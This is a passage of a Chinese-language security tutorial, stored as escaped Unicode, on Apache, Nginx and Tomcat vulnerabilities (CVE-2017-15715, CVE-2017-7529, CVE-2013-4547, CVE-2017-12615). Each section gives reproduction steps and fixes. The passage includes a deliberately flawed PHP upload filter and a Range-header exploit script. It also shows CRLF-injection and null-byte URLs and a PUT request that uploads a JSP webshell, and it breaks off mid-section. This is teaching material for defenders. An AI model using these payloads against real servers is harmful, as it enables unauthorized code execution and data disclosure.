(1)apache\u5728\u89e3\u6790\u6587\u4ef6\u65f6\u6709\u4e00\u4e2a\u539f\u5219\uff1a\u5f53\u78b0\u5230\u4e0d\u8ba4\u8bc6\u7684\u6269\u5c55\u540d\u65f6\uff0c\u5c06\u4f1a\u4ece\u540e\u5f80\u524d\u89e3\u6790\uff0c\u76f4\u5230\u9047\u5230\u8ba4\u8bc6\u7684\u6269<\/p>\n
\u5c55\u540d\u4e3a\u6b62<\/p>\n
(2)\u5982\u679c\u90fd\u4e0d\u8ba4\u8bc6\u5c06\u4f1a\u66b4\u9732\u6e90\u7801<\/p>\n
\u5728apache\u914d\u7f6e\u4e0d\u5f53\u7684\u65f6\u5019\u5c31\u4f1a\u9020\u6210apache\u89e3\u6790\u6f0f\u6d1e<\/p>\n
\u590d\u73b0<\/h3>\n
1\u3001\u5728httpd.conf \u628a\u6ce8\u91ca\u53bb\u6389\uff0c\u540e\u7f00\u662f\u5b58\u5728.php .phtml\u90fd\u4f1a\u89e3\u6790\u6210php\u6587\u4ef6<\/p>\n
AddType application\/x-httpd-php .php .phtml<\/p>\n
<\/p>\n
\u4fee\u590d\u5efa\u8bae<\/h3>\n
1.\u5728httpd.conf\u6216httpd-vhosts.conf\u4e2d\u52a0\u5165\u4ee5\u4e0b\u8bed\u53e5\uff0c\u4ece\u800c\u7981\u6b62\u6587\u4ef6\u540d\u683c\u5f0f\u4e3a.php.\u7684\u8bbf\u95ee\u6743\u9650<\/p>\n
<FilesMatch \".(php.|php3.|php4.|php5.)\">\nOrder Deny,Allow\nDeny from all\n<\/FilesMatch><\/code><\/pre>\n2.\u628a\u914d\u7f6e\u4e0d\u5f53\u7684\u6587\u4ef6\u8fdb\u884c\u4fee\u6539<\/p>\n
3\u3001\u76ee\u5f55\u904d\u5386\u6f0f\u6d1e<\/h2>\n\u539f\u7406<\/h3>\n
\u5ba2\u6237\u7aef\u8bbf\u95ee\u5230\u4e00\u4e2a\u76ee\u5f55\u65f6\uff0cApache\u670d\u52a1\u5668\u5c06\u4f1a\u9ed8\u8ba4\u5bfb\u627e\u4e00\u4e2aindex list\u4e2d\u7684\u6587\u4ef6\uff0c\u82e5\u6587 \u4ef6\u4e0d\u5b58\u5728\uff0c\u5219\u4f1a\u5217\u51fa\u5f53\u524d\u76ee\u5f55\u4e0b\u6240\u6709\u6587\u4ef6\u6216\u8fd4\u56de403\u72b6\u6001\u7801\uff0c\u800c\u5217\u51fa\u76ee\u5f55\u4e0b\u6240\u6709\u6587\u4ef6\u7684\u884c\u4e3a\u79f0\u4e3a\u76ee\u5f55\u904d\u5386<\/p>\n
\u590d\u73b0<\/h3>\nDocumentRoot \"C:phpStudyWWW\"\n<Directory \/>\nOptions +Indexes +FollowSymLinks +ExecCGI\nAllowOverride All\nOrder allow,deny\nAllow from all\nRequire all granted\n<\/Directory><\/code><\/pre>\n<\/p>\n
\u9632\u5fa1<\/h3>\n
\u5728httpd.conf\u6587\u4ef6\u4e2d\u627e\u5230Options + Indexes + FollowSymLinks + ExecCGI\u5e76\u4fee\u6539\u6210Options -Indexes +FollowSymLinks + ExecCGI\u5e76\u4fdd\u5b58\uff08\u5427+\u4fee\u6539\u4e3a-\uff09<\/p>\n
\n- Indexes \u5141\u8bb8\u76ee\u5f55\u6d4f\u89c8<\/li>\n<\/ul>\n
\u2014 Indexes \u7981\u6b62\u76ee\u5f55\u6d4f\u89c8<\/p>\n
<\/p>\n
4\u3001Apache HTTPD \u6362\u884c\u89e3\u6790\u6f0f\u6d1e\uff08CVE-2017-15715\uff09<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
Apache HTTPD\u662f\u4e00\u6b3eHTTP\u670d\u52a1\u5668\uff0c\u5b83\u53ef\u4ee5\u901a\u8fc7mod_php\u6765\u8fd0\u884cPHP\u7f51\u9875\u3002\u51762.4.0~2.4.29\u7248\u672c\u4e2d\u5b58\u5728\u4e00\u4e2a\u89e3\u6790\u6f0f\u6d1e\uff0c\u5728\u89e3\u6790PHP\u65f6\uff0c1.phpx0a\u5c06\u88ab\u6309\u7167PHP\u540e\u7f00\u8fdb\u884c\u89e3\u6790\uff0c\u5bfc\u81f4\u7ed5\u8fc7\u4e00\u4e9b\u670d\u52a1\u5668\u7684\u5b89\u5168\u7b56\u7565\u3002<\/p>\n
\u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u83b7\u53d6\u6587\u4ef6\u540d\u662f\u9700\u8981\u5355\u72ecpost\u4e00\u4e2aname\u7684\uff0c\u56e0\u4e3a\u5982\u679c\u901a\u8fc7 $_FILES[‘file’][‘name’] \u83b7\u53d6\u6587\u4ef6\u540d\u7684\u8bdd\uff0c\u4f1a\u628ax0a\u81ea\u52a8\u53bb\u9664\uff0c\u6240\u4ee5 $_FILES[‘file’][‘name’] \u8fd9\u79cd\u65b9\u5f0f\u83b7\u53d6\u6587\u4ef6\u540d\u5c31\u4e0d\u4f1a\u9020\u6210\u8fd9\u4e2a\u6f0f\u6d1e<\/p>\n
\u5f71\u54cd\u8303\u56f4<\/h3>\n
apache \uff1a2.4.0~2.4.29\u7248\u672c<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n<html>\n<head><meta charset=\"utf-8\"><\/head>\n<body>\n<form action=\"\" method=\"post\" enctype=\"multipart\/form-data\">\n<label for=\"file\">\u6587\u4ef6\u540d\uff1a<\/label>\n<input type=\"file\" name=\"file\" id=\"file\"><br>\n<input type=\"text\" name=\"name\" <br>\n<input type=\"submit\" name=\"submit\" value=\"\u63d0\u4ea4\">\n<\/form>\n<\/body>\n<\/html>\n<br \/>\n<?php\nif(isset($_FILES['file'])){\n#1.php php\n$name =basename($_POST['name']);\n$ext = pathinfo($name,PATHINFO_EXTENSION);\n$array=array('php','php3','php4','php5','phtml','pht');\nif(in_array($ext,$array)){\nexit('bad file');\n}\nmove_uploaded_file($_FILES['file']['tmp_name'],'.\/'.$name);\n}\n?><\/code><\/pre>\n\u540e\u53f0\u662f\u901a\u8fc7\u9ed1\u540d\u5355\u65b9\u5f0f\u8fc7\u6ee4\u4e86php\u540e\u7f00\u7684\u6587\u4ef6\uff0c\u6839\u636e\u6700\u5f00\u59cb\u7684\u77e5\u8bc6\uff0c\u4ec0\u4e48\u6837\u7684\u6587\u4ef6\u7b97\u662fphp\u6587\u4ef6\u5462\uff1f\u5728\u6709\u5b9a\u4e49\uff0c\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u662f\u4ee5php\u7ed3\u5c3e\u7684\u6587\u4ef6\u90fd\u7b97php\u6587\u4ef6\uff0c\u5728\u6b63\u5219\u4e2d\u8868\u793a\u5339\u914d\u8f93\u5165\u5b57\u7b26\u4e32\u7684\u7ed3\u5c3e\u4f4d\u7f6e\u3002\u5982\u679c\u8bbe\u7f6e\u4e86 RegExp\u5bf9\u8c61\u7684 Multiline\u5c5e\u6027\uff0c\u5219\u4e5f\u5339\u914d n \u6216 r\u6070\u597d\uff0c\u6211\u4eec\u5728\u6587\u4ef6\u672b\u5c3e\u52a0\u4e860x0a\uff08n\uff09\uff0c\u6240\u4ee5\u88ab\u5339\u914d\u6210\u529f\u4e86\u3002<\/p>\n
0x0a\u548c0x0d<\/p>\n
\n1.0x0d r CR\u8fd9\u4e09\u8005\u4ee3\u8868\u662f\u56de\u8f66\uff0c\u662f\u540c\u4e00\u4e2a\u4e1c\u897f\uff0c\u56de\u8f66\u7684\u4f5c\u7528\u53ea\u662f\u79fb\u52a8\u5149\u6807\u81f3\u8be5\u884c\u7684\u8d77\u59cb\u4f4d\u7f6e<\/p>\n
2.0x0a n CL\u8fd9\u4e09\u8005\u4ee3\u8868\u6362\u884c\uff0c\u662f\u540c\u4e00\u4e2a\u4e1c\u897f\uff0c\u6362\u884c\u81f3\u4e0b\u4e00\u884c\u884c\u9996\u8d77\u59cb\u4f4d\u7f6e<\/p>\n<\/blockquote>\n
\u6253\u5f00<\/p>\n
sudo docker stop charming_kare<\/p>\n
sudo docker rm charming_kare<\/p>\n
sudo docker images<\/p>\n
sudo docker run -d -p 80:80 -v \/var\/run\/docker.sock:\/var\/run\/docker.sock -e<\/p>\n
VUL_IP=0.0.0.0 7ea558c9f385<\/p>\n
\u8fdb\u5165\u5bb9\u5668<\/p>\n
sudo docker exec -it practical_snyder \/bin\/bash<\/p>\n
<\/p>\n
\u628a2e\u6539\u62100a<\/p>\n
<\/p>\n
http:\/\/192.168.0.159:62059\/moona.php%0a<\/a><\/p>\n\u4fee\u590d\u5efa\u8bae<\/h3>\n
1.\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c<\/p>\n
2.\u6216\u5c06\u4e0a\u4f20\u7684\u6587\u4ef6\u91cd\u547d\u540d\u4e3a\u4e3a\u65f6\u95f4\u6233+\u968f\u673a\u6570+.jpg\u7684\u683c\u5f0f\u5e76\u7981\u7528\u4e0a\u4f20\u6587\u4ef6\u76ee\u5f55\u6267\u884c<\/p>\n
\u56db\u3001nginx<\/h1>\n
Nginx\u662f\u4e00\u6b3e\u8f7b\u91cf\u7ea7\u7684Web \u670d\u52a1\u5668\/\u53cd\u5411\u4ee3\u7406\u670d\u52a1\u5668\u53ca\u7535\u5b50\u90ae\u4ef6\uff08IMAP\/POP3\uff09\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5728BSD-like\u534f\u8bae\u4e0b\u53d1\u884c\u3002\u5176\u7279\u70b9\u662f\u5360\u6709\u5185\u5b58\u5c11\uff0c\u5e76\u53d1\u80fd\u529b\u5f3a\uff0c\u4e8b\u5b9e\u4e0anginx\u7684\u5e76\u53d1\u80fd\u529b\u786e\u5b9e\u5728\u540c\u7c7b\u578b\u7684\u7f51\u9875\u670d\u52a1\u5668\u4e2d\u8868\u73b0\u8f83\u597d<\/p>\n
1\u3001\u6587\u4ef6\u89e3\u6790\u6f0f\u6d1e<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
\u8be5\u6f0f\u6d1e\u662f\u7531\u4e8eNginx\u4e2dphp\u914d\u7f6e\u4e0d\u5f53\u800c\u9020\u6210\u7684\uff0c\u4e0eNginx\u7248\u672c\u65e0\u5173\uff0c\u4f46\u5728\u9ad8\u7248\u672c\u7684php\u4e2d\uff0c\u7531\u4e8esecurity.limit_extensions\u7684\u5f15\u5165\uff0c\u4f7f\u5f97\u8be5\u6f0f\u6d1e\u96be\u4ee5\u88ab\u6210\u529f\u5229\u7528\u3002<\/p>\n
\u5728\u5df2\u7ecf\u4e0a\u4f20\u4e86\u6076\u610f1.jpg\u6587\u4ef6\u540e\uff0c\u8bbf\u95ee\/1.jpg\/xxx.php\uff0c\uff08\u8def\u5f84\u4fee\u590dcgi.fix_pathinfo=1\u540e\uff09\u4f7f\u5f97Nginx\u5c06\u5176\u89e3\u6790\u4e3aphp\u6587\u4ef6\u4f20\u7ed9php-cgi\u7a0b\u5e8f\uff08\u4f20\u7ed9\u8def\u5f84\u4f4d\u4e8eSERVER["SCRIPT_FILENAME"]\uff0c\u4fee\u590d\u53bb\u9664\u8def\u5f84\u4f4dSERVER["PATH_INFO"]\uff09\uff0c\u4f46cgi\u7a0b\u5e8f\u5c06\u5176\u89e3\u6790\u4e3a1.jpg\u5e76\u6267\u884c<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u4f7f\u7528phpstudy nginx php5.2.7<\/p>\n
<\/p>\n
<\/p>\n
\u6f0f\u6d1e\u539f\u7406\u5206\u6790<\/h3>\n
Nginx\u7684\u5904\u7406\u7a0b\u5e8f\u548cFastCGI\u5904\u7406\u7a0b\u5e8f\u4e0d\u540c\u5bfc\u81f4<\/p>\n
Nginx\u62ff\u5230URI\u4e3a\/1.jpg\/xxx.php\u540e\uff0c\u8bc6\u522b\u5904\u540e\u7f00\u662f.php\uff0c\u8ba4\u4e3a\u662fphp\u6587\u4ef6\uff0c\u8f6c\u4ea4\u7ed9PHP FastCGI\u5904\u7406\u7a0b\u5e8f\u53bb\u5904\u7406\u3002PHP FastCGI\u5904\u7406\u7a0b\u5e8f\u8bc6\u522b\u8be5URI\uff1a \/1.jpg\/xxx.php\u4e0d\u5b58\u5728\uff0c\u6309\u7167PHP FastCGI\u5904\u7406\u7a0b\u5e8f\u81ea\u5df1\u7684\u89c4\u5219\uff0c\u5220\u53bb\u6700\u540e\u7684\/xxx.php\uff0c\u53c8\u770b\/1.jpg\u5b58\u5728\uff0c\u5c31\u5c06\/1.jpg\u5f53\u6210\u8981\u6267\u884c\u7684\u6587\u4ef6\uff0c\u5c31\u6210\u529f\u89e3\u6790\u3002<\/p>\n
Nginx\u4f20\u9001\u7ed9PHP FastCGI\u5904\u7406\u7a0b\u5e8f\u7684\u8def\u5f84\u53ef\u4ee5\u5728phpinfo\u4e2d\u67e5\u770b\u3010\u4f20\u9001\u8def\u5f84\u67e5\u770b\u3011<\/p>\n
<\/p>\n
\u5f53php\u9047\u5230\u6587\u4ef6\u8def\u52b2\u4e3a\/1.jpg\/xxx.php\/ss.001\u65f6\uff0c\u8be5\u6587\u4ef6\u4e0d\u5b58\u5728\uff0c\u4f1a\u5220\u9664\u6700\u540e\u7684\/ss.001\uff0c\u518d\u5224\u65ad\/1.jpg\/xxx.php\u662f\u5426\u5b58\u5728\uff0c\u82e5\u5b58\u5728\u5219\u5c06\/1.jpg\/xxx.php\u5f53\u4f5c\/1.jpg\/xxx.php\/ss.001\u6587\u4ef6\uff0c\u82e5\u4e0d\u5b58\u5728\uff0c\u5219\u7ee7\u7eed\u5220\u9664\u6700\u540e\u4e00\u4e2a\u8def\u5f84\u3002\u5220\u9664\u7684\u591a\u4f59\u8def\u5f84\u4f1a\u5b58\u5728PATH_INFO\u4e2d\uff0c\u5728\u8fd9\u91cc\u4e3ass.001<\/p>\n
<\/p>\n
\u4fee\u590d\u65b9\u6848<\/h3>\n
1\u3001 \u5c06php.ini\u6587\u4ef6\u4e2d\u7684cgi.fix_pathinfo\u7684\u503c\u8bbe\u7f6e\u4e3a0,\u8fd9\u6837php\u518d\u89e3\u67901.php\/1.jpg\u8fd9\u6837\u7684\u76ee\u5f55\u65f6,\u53ea\u89811.jpg\u4e0d\u5b58\u5728\u5c31\u4f1a\u663e\u793a404\u9875\u9762<\/p>\n
2\u3001 php-fpm.conf\u4e2d\u7684security.limit_extensions\u540e\u9762\u7684\u503c\u8bbe\u7f6e\u4e3a.php<\/p>\n
2\u3001\u76ee\u5f55\u904d\u5386\u6f0f\u6d1e<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
Nginx\u7684\u76ee\u5f55\u904d\u5386\u4e0eapache\u4e00\u6837,\u5c5e\u4e8e\u914d\u7f6e\u65b9\u9762\u7684\u95ee\u9898,\u9519\u8bef\u7684\u914d\u7f6e\u53ef\u5bfc\u81f4\u76ee\u5f55\u904d\u5386\u4e0e\u6e90\u7801\u6cc4\u9732<\/p>\n
\u6f0f\u6d1e\u539f\u7406<\/h3>\n
\u4fee\u6539nginx.conf,\u5728\u5982\u4e0b\u56fe\u4f4d\u7f6e\u6dfb\u52a0autoindex on<\/p>\n
autoindex on;<\/p>\n
autoindex on \u5f00\u542f\u76ee\u5f55\u6d4f\u89c8 autoindex off\u5173\u95ed\u76ee\u5f55\u6d4f\u89c8 \u9ed8\u8ba4\u662f\u5173\u95ed\u72b6\u6001<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1.\u8bbe\u7f6e autoindex off \u5173\u95ed\u76ee\u5f55\u6d4f\u89c8<\/p>\n
2.\u5220\u9664 autoindex on<\/p>\n
3\u3001\u7a7a\u5b57\u8282\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
\u5728\u4f7f\u7528PHP-FastCGI\u6267\u884cphp\u7684\u65f6\u5019\uff0cURL\u91cc\u9762\u5728\u9047\u5230%00\u7a7a\u5b57\u8282\u65f6\u4e0eFastCGI\u5904\u7406\u4e0d\u4e00\u81f4\uff0c\u5bfc\u81f4\u53ef\u5728\u975ephp\u6587\u4ef6\u4e2d\u5d4c\u5165php\u4ee3\u7801\uff0c\u901a\u8fc7\u8bbf\u95eeurl+%00.php\u6765\u6267\u884c\u5176\u4e2d\u7684php\u4ee3\u7801\u3002\u5982\uff1ahttp:\/\/local\/robots.txt.php<\/a>\u4f1a\u628arobots.txt\u6587\u4ef6\u5f53\u4f5cphp\u6765\u6267\u884c<\/p>\n\u5f71\u54cd\u7248\u672c\uff1a<\/p>\n
nginx 0.5.*<\/p>\n
nginx 0.6.*<\/p>\n
nginx 0.7 <= 0.7.65<\/p>\n
nginx 0.8 <= 0.8.37<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u5f00\u542fnginx<\/p>\n
<\/p>\n
\u5728\u7f51\u7ad9\u76ee\u5f55\u4e0b\u6dfb\u52a01.jpg\u6587\u4ef6<\/p>\n
<\/p>\n
\u8bbf\u95ee\u8be5\u6587\u4ef6<\/p>\n
<\/p>\n
\u6293\u5305\uff0c\u6dfb\u52a0%00<\/p>\n
\u8fd9\u91cc\u7531\u4e8e\u8be5\u56fe\u975e\u6b63\u5e38\uff0c\u5728\u6293\u5305\u65f6\u6700\u540e\u9762\u6dfb\u52a0..\uff0c\u53ef\u4ee5\u8ba9burpsuite\u6293\u5230<\/p>\n
\u5c06\u8bf7\u6c42\u4fee\u6539\u4e3a\uff1a<\/p>\n
\/1.jpg..php<\/p>\n
<\/p>\n
\u53d1\u5305<\/p>\n
<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1.\u5728nginx\u865a\u62df\u673a\u914d\u7f6e\u6216\u8005fcgi.conf\u914d\u7f6e\u52a0\u5982\u4e0b\u4ee3\u7801<\/p>\n
if ($request_filename ~* (.*).php) {\nset $php_url $1;\n}\nif (!-e $php_url.php) {\nreturn 403;\n}<\/code><\/pre>\n2.\u5347\u7ea7 nginx<\/p>\n
4\u3001\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e\uff08CVE-2017-7529\uff09<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
\u5728 Nginx \u7684 range filter \u4e2d\u5b58\u5728\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u901a\u8fc7\u5e26\u6709\u7279\u6b8a\u6784\u9020\u7684 range \u7684 HTTP \u5934\u7684\u6076\u610f\u8bf7\u6c42\u5f15\u53d1\u8fd9\u4e2a\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u5e76\u5bfc\u81f4\u4fe1\u606f\u6cc4\u9732\u3002<\/p>\n
\u8be5\u6f0f\u6d1e\u5f71\u54cd\u6240\u6709 0.5.6 – 1.13.2\u7248\u672c\u5185\u9ed8\u8ba4\u914d\u7f6e\u6a21\u5757\u7684Nginx\u53ea\u9700\u8981\u5f00\u542f\u7f13\u5b58\u653b\u51fb\u8005\u5373\u53ef\u53d1\u9001\u6076\u610f\u8bf7\u6c42\u8fdb\u884c\u8fdc\u7a0b\u653b\u51fb\u9020\u6210\u4fe1\u606f\u6cc4\u9732\u3002\u5f53Nginx\u670d\u52a1\u5668\u4f7f\u7528\u4ee3\u7406\u7f13\u5b58\u7684\u60c5\u51b5\u4e0b\u653b\u51fb\u8005\u901a\u8fc7\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u62ff\u5230\u670d\u52a1\u5668\u7684\u540e\u7aef\u771f\u5b9eIP\u6216\u5176\u4ed6\u654f\u611f\u4fe1\u606f\u3002<\/p>\n
\u901a\u8fc7\u6211\u4eec\u7684\u5206\u6790\u5224\u5b9a\u8be5\u6f0f\u6d1e\u5229\u7528\u96be\u5ea6\u4f4e\u53ef\u4ee5\u5f52\u5c5e\u4e8elow-hanging-fruit\u7684\u6f0f\u6d1e\u5728\u771f\u5b9e\u7f51\u7edc\u653b\u51fb\u4e2d\u4e5f\u6709\u4e00\u5b9a\u5229\u7528\u4ef7\u503c<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
https:\/\/github.com\/vulhub\/vulhub\/tree\/master\/nginx\/CVE-2017-7529<\/a><\/p>\n\u68c0\u6d4b\u811a\u672c<\/p>\n
#!\/usr\/bin\/env python\nimport sys\nimport requests\nif len(sys.argv) < 2:\nprint(\"%s url\" % (sys.argv[0]))\nprint(\"eg: python %s http:\/\/your-ip:8080\/\" % (sys.argv[0]))\nsys.exit()\nheaders = {\n'User-Agent': \"Mozilla\/5.0 (Windows NT 10.0) AppleWebKit\/537.36 (KHTML, like\nGecko) Chrome\/42.0.2311.135 Safari\/537.36 Edge\/12.10240\"\n}\noffset = 605\nurl = sys.argv[1]\nfile_len = len(requests.get(url, headers=headers).content)\nn = file_len + offset\nheaders['Range'] = \"bytes=-%d,-%d\" % (\nn, 0x8000000000000000 - n)\nr = requests.get(url, headers=headers)<\/code><\/pre>\n\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
\u5347\u7ea7\u7248\u672c<\/p>\n
5\u3001CRLF\u6ce8\u5165\u6f0f\u6d1e<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
Nginx\u5c06\u4f20\u5165\u7684url\u8fdb\u884c\u89e3\u7801\uff0c\u5bf9\u5176\u4e2d\u7684%0a%0d\u66ff\u6362\u6210\u6362\u884c\u7b26\uff0c\u5bfc\u81f4\u540e\u9762\u7684\u6570\u636e\u6ce8\u5165\u81f3\u5934\u90e8\uff0c\u9020\u6210CRLF\u6ce8\u5165\u6f0f\u6d1e<\/p>\n
\u590d\u73b0<\/h3>\n
\u8bbe\u7f6ehttps\u8df3\u8f6c\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u63a5\u6536\u5230url\uff0c\u8fdb\u800c\u8fdb\u884c\u5904\u7406\u3002\u5728<\/p>\n
C:phpStudyPHPTutorialnginxconfnginx.conf\u6587\u4ef6\u4e2d\u6dfb\u52a0\u4e0b\u9762\u4e00\u884c\u8bdd<\/p>\n
location \/ {<\/p>\n
return 302 https:\/\/$host$uri<\/a>;<\/p>\n}<\/p>\n
<\/p>\n
\u6784\u9020url\uff0c\u8bbf\u95ee<\/p>\n
http:\/\/192.168.0.155\/%0ASet-cookie:JSPSESSID%3D3<\/a><\/p>\n<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1\u3001\u5220\u9664\u914d\u7f6e\u4e0d\u5f53\u7684\u914d\u7f6e<\/p>\n
6\u3001\u6587\u4ef6\u540d\u903b\u8f91\u6f0f\u6d1e\uff08CVE-2013-4547\uff09<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
\u8fd9\u4e00\u6f0f\u6d1e\u7684\u539f\u7406\u662f\u975e\u6cd5\u5b57\u7b26\u7a7a\u683c\u548c\u622a\u6b62\u7b26\uff08\u0000\uff09\u4f1a\u5bfc\u81f4Nginx\u89e3\u6790URI\u65f6\u7684\u6709\u9650\u72b6\u6001\u673a\u6df7\u4e71\uff0c\u6b64\u6f0f\u6d1e\u53ef\u5bfc\u81f4\u76ee\u5f55\u8de8\u8d8a\u53ca\u4ee3\u7801\u6267\u884c\uff0c\u5176\u5f71\u54cd\u7248\u672c\u4e3a\uff1anginx 0.8.41 \u2013 1.5.6<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u521b\u5efa 1.jpg \u6587\u4ef6\uff0c\u5e76\u4e0a\u4f20<\/p>\n
\u6293\u5305\uff0c\u5728\u8be5\u6587\u4ef6\u6700\u540e\u6dfb\u52a0\u4e00\u4e2a\u7a7a<\/p>\n
<\/p>\n
<\/p>\n
\u53ef\u4ee5\u770b\u5230\u4e0a\u4f20\u6210\u529f<\/p>\n
<\/p>\n
\u8bbf\u95ee\u8be5\u6587\u4ef6\uff0cburpbuite\u6293\u5305\u5904\u7406<\/p>\n
\u8bbf\u95eeURL\uff1ahttp:\/\/192.168.112.111\/1.jpg…php<\/a><\/p>\n\u5728burp\u7684hex\u9875\u9762\u4e2d\u5c06\u7b2c\u4e00\u4e2a\u70b9.\u6539\u621020\uff0c\u7b2c\u4e8c\u4e2a\u6539\u4e3a00<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1.\u5347\u7ea7nginx<\/p>\n
\u4e94\u3001tomcat<\/h1>\n
tomcat\u662f\u4e00\u4e2a\u5f00\u6e90\u800c\u4e14\u514d\u8d39\u7684jsp\u670d\u52a1\u5668\uff0c\u5c5e\u4e8e\u8f7b\u91cf\u7ea7\u5e94\u7528\u670d\u52a1\u5668\u3002\u5b83\u53ef\u4ee5\u5b9e\u73b0JavaWeb\u7a0b\u5e8f\u7684\u88c5\u8f7d\uff0c\u662f<\/p>\n
\u914d\u7f6eJSP\uff08Java Server Page\uff09\u548cJAVA\u7cfb\u7edf\u5fc5\u5907\u7684\u4e00\u6b3e\u73af\u5883<\/p>\n
\u76ee\u5f55\u4ecb\u7ecd<\/p>\n
<\/p>\n
webapp\uff1a\u5de5\u7a0b\u53d1\u5e03\u6587\u4ef6\u5939\u3002\u5176\u5b9e\u6bcf\u4e2a war \u5305\u90fd\u53ef\u4ee5\u89c6\u4e3a webapp \u7684\u538b\u7f29\u5305\u3002<\/p>\n
META-INF\uff1aMETA-INF \u76ee\u5f55\u7528\u4e8e\u5b58\u653e\u5de5\u7a0b\u81ea\u8eab\u76f8\u5173\u7684\u4e00\u4e9b\u4fe1\u606f\uff0c\u5143\u6587\u4ef6\u4fe1\u606f\uff0c\u901a\u5e38\u7531\u5f00\u53d1\u5de5\u5177\uff0c\u73af\u5883\u81ea\u52a8\u6210\u3002<\/p>\n
WEB-INF\uff1aJava web\u5e94\u7528\u7684\u5b89\u5168\u76ee\u5f55\u3002\u6240\u8c13\u5b89\u5168\u5c31\u662f\u5ba2\u6237\u7aef\u65e0\u6cd5\u8bbf\u95ee\uff0c\u53ea\u6709\u670d\u52a1\u7aef\u53ef\u4ee5\u8bbf\u95ee\u7684\u76ee\u5f55\u3002<\/p>\n
\/WEB-INF\/classes\uff1a\u5b58\u653e\u7a0b\u5e8f\u6240\u9700\u8981\u7684\u6240\u6709 Java class \u6587\u4ef6\u3002<\/p>\n
\/WEB-INF\/lib\uff1a\u5b58\u653e\u7a0b\u5e8f\u6240\u9700\u8981\u7684\u6240\u6709 jar \u6587\u4ef6\u3002<\/p>\n
\/WEB-INF\/web.xml\uff1aweb \u5e94\u7528\u7684\u90e8\u7f72\u914d\u7f6e\u6587\u4ef6\u3002\u5b83\u662f\u5de5\u7a0b\u4e2d\u6700\u91cd\u8981\u7684\u914d\u7f6e\u6587\u4ef6\uff0c\u5b83\u63cf\u8ff0\u4e86 servlet \u548c\u7ec4\u6210\u5e94\u7528\u7684\u5176\u5b83\u7ec4\u4ef6\uff0c\u4ee5\u53ca\u5e94\u7528\u521d\u59cb\u5316\u53c2\u6570\u3001\u5b89\u5168\u7ba1\u7406\u7ea6\u675f\u7b49\u3002<\/p>\n
1\u3001Tomcat \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2017-12615\uff09<\/h2>\n
\u5f53 Tomcat\u8fd0\u884c\u5728Windows\u64cd\u4f5c\u7cfb\u7edf\u65f6\uff0c\u4e14\u542f\u7528\u4e86HTTP PUT\u8bf7\u6c42\u65b9\u6cd5\uff08\u4f8b\u5982\uff0c\u5c06 readonly \u521d\u59cb\u5316\u53c2\u6570\u7531\u9ed8\u8ba4\u503c\u8bbe\u7f6e\u4e3a false\uff09\uff0c\u653b\u51fb\u8005\u5c06\u6709\u53ef\u80fd\u53ef\u901a\u8fc7\u7cbe\u5fc3\u6784\u9020\u7684\u653b\u51fb\u8bf7\u6c42\u6570\u636e\u5305\u5411\u670d\u52a1\u5668\u4e0a\u4f20\u5305\u542b\u4efb\u610f\u4ee3\u7801\u7684 JSP \u6587\u4ef6\uff0cJSP\u6587\u4ef6\u4e2d\u7684\u6076\u610f\u4ee3\u7801\u5c06\u80fd\u88ab\u670d\u52a1\u5668\u6267\u884c\u3002\u5bfc\u81f4\u670d\u52a1\u5668\u4e0a\u7684\u6570\u636e\u6cc4\u9732\u6216\u83b7\u53d6\u670d\u52a1\u5668\u6743\u9650\u3002<\/p>\n
\u6f0f\u6d1e\u539f\u7406<\/h3>\n
\u5f53\u5728Tomcat\u7684conf\uff08\u914d\u7f6e\u76ee\u5f55\u4e0b\uff09\/web.xml\u914d\u7f6e\u6587\u4ef6\u4e2d\u6dfb\u52a0readonly\u8bbe\u7f6e\u4e3afalse\u65f6\uff0c\u5c06\u5bfc\u81f4\u8be5\u6f0f\u6d1e\u4ea7\u751f\uff0c\uff08\u9700\u8981\u5141\u8bb8put\u8bf7\u6c42\uff09<\/p>\n
CVE-2017-12615\u5f71\u54cd\u8303\u56f4\uff1a Apache Tomcat 7.0.0 – 7.0.79 Apache Tomcat\/8.5.19<\/p>\n
<init-param>\n<param-name>readonly<\/param-name>\n<param-value>false<\/param-value>\n<\/init-param><\/code><\/pre>\n<\/p>\n
\u6587\u4ef6\u4e0b\u8f7d https:\/\/github.com\/rebeyond\/Behinder\/releases<\/a><\/p>\n\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u62c9\u53d6\u9776\u573a \u542f\u52a8<\/p>\n
<\/p>\n
\u652f\u6301\u4e09\u79cd\u4e0a\u4f20\u7ed5\u8fc7\u65b9\u5f0f \u9ed8\u8ba4\u4f7f\u7528put \u52a0\u6587\u4ef6\u540d\u662f\u5931\u8d25\u7684 \u9700\u8981\u7ed5\u8fc7<\/p>\n
PUT \/shell.jsp%20<\/p>\n
